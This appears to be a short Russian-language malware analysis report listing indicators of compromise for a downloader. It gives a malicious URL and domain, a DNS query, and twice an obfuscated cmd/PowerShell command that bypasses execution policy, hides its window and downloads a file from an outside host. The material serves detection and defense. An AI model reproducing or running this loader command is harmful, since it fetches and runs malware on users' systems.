Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^owE^r^sH^E^lL^.^Exe -E^xE^cuTI^onP^o^LIc^y b^yPASS^ -^N^Op^rOfi^lE^ ^-^wI^ndO^wSTY^lE ^H^iDde^N^ ^(^nEw^-^o^Bj^EC^t SyS^TEm.^Ne^t^.W^e^bC^LI^E^NT).dOWnL^OAdFILe(^'http://ww...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^owE^r^sH^E^lL^.^Exe -E^xE^cuTI^onP^o^LIc^y b^yPASS^ -^N^Op^rOfi^lE^ ^-^wI^ndO^wSTY^lE ^H^iDde^N^ ^(^nEw^-^o^Bj^EC^t SyS^TEm.^Ne^t^.W^e^bC^LI^E^NT).dOWnL^OAdFILe(^'http://ww...' (со скрытым окном)